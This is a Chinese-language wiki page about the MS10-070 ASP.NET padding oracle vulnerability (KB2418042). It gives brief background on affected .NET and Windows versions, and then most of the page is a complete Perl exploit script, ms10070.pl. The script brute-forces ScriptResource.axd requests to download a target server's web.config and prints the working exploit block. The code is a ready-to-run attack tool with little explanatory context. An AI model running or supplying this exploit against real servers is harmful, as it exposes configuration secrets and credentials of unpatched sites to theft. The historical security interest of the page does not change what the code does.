习科小黑板 - Silic Wiki

MS10-070补丁代码为KB2418042，报道称，这个漏洞将使得攻击这能够查看目标服务器的加密数据，比如View State，甚至还可以读取目标服务器上的文件数据，比如web.config，更有甚者称能够利用这个漏洞篡改服务器上的文件数据。
我们来详细看一下这个漏洞的相关信息：

微软指出，.NET Framework 3.5 SP1之前的版本并不受此漏洞影响。微软将此次发布的补丁定级为重要，适用于除了.NET Framework 1.0 SP3之外的当前所有ASP.NET版本。存在的这个漏洞影响的操作系统包括：Windows XP SP3、Windows Server 2003、Windows Vista、Windows Server 2008、Windows 7、Windows Server 2008 R2。
这个补丁的公共编号为MS10-070，知识库编号为KB2418042，是微软继月初发布9个例行补丁之后的第十个补丁，也是为数不多的几个紧急补丁。

程序代码的名称是：exploit tool for downloading Web.config
也就是web.config下载利用程序

ms10070.pl

#!/usr/bin/perl
use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
#Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;
my $testUrl;
my $testBytes;
my $sampleBytes;
my $testUrl = @ARGV[0]."\?d\=";
my $sampleBytes = @ARGV[1];
my $blockSize = @ARGV[2];
if ($#ARGV < 2) {
 die "   
  Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize
  Where: URL = The target URL (and query string if applicable)
         EncryptedSample = The encrypted value you want to use.
         This need to come from Padbuster.
         BlockSize = The block size being used by the algorithm (8 or 16)
         Poc code by giorgio.fedon\@mindedsecurity.com
  Original Padbuster code from Brian Holyfield - Gotham Digital Science
 
Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd  d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16
 
";}
my $method = "GET";
$sampleBytes = encoder($sampleBytes, 1);
my $testBytes = "\x00" x $blockSize;
my $counter = 0;
# Use random bytes
my @nums = (0..255);
my $status = 1;
  while ($status)
  {
   # Fuzz the test bytes
   for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--)
   {
   substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
                  }
                   # Combine the test bytes and the sample
   my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
   chomp($combinedTestBytes);
   $combinedTestBytes =~ s/\%0A//g;
   # Ok, now make the request
   my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes);
   if ($status == "200")
   {
   # Remove this for "T" exploit
   if (index($content,"parent\.Sys\.Application") == -1)
   {
   print $content."\n\n";
   print "Total Requests:".$counter."\n\n";
   print "Resulting Exploit Block:".$combinedTestBytes."\n\n";
   last;
   }
   }
   $counter++;
   }
# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
# I also did the encoder / decoder, but your logic is definitely better
sub encoder
{
my ($toEncodeDecode, $oper) = @_;
 # UrlDecoder Encoder
 if ($oper == 1)
   {
$toEncodeDecode =~ s/\-/\+/g;
$toEncodeDecode =~ s/\_/\//g;
my $count = chop($toEncodeDecode);
$toEncodeDecode = $toEncodeDecode.("=" x int($count));
$returnVal = decode_base64($toEncodeDecode);
   }
   else
   {
$b64Encoded = encode_base64($toEncodeDecode);
$b64Encoded =~ s/(\r|\n)//g;
$b64Encoded =~ s/\+/\-/g;
$b64Encoded =~ s/\//\_/g;
my $count = $b64Encoded =~ s/\=//g;
($count eq "") ? ($count = 0) : "";
$returnVal = $b64Encoded.$count;
   }
 
 return $returnVal;
}
sub makeRequest {
 my ($method, $url) = @_;
 my ($lwp, $status, $content, $req, $location, $contentLength);  
 
 # Setup LWP UserAgent
 $lwp = LWP::UserAgent->new(env_proxy => 1,
                            keep_alive => 1,
                            timeout => 30,
       requests_redirectable => [],
                            );
 $req = new HTTP::Request $method => $url;
 my $response = $lwp->request($req);
 # Extract the required attributes from the response
 $status = substr($response->status_line, 0, 3);
 $content = $response->content;
 #print $content;
 $location = $response->header("Location");
 if ($location eq "")
 {
  $location = "N/A";
 }
 $contentLength = $response->header("Content-Length");
 return ($status, $content, $location, $contentLength);
}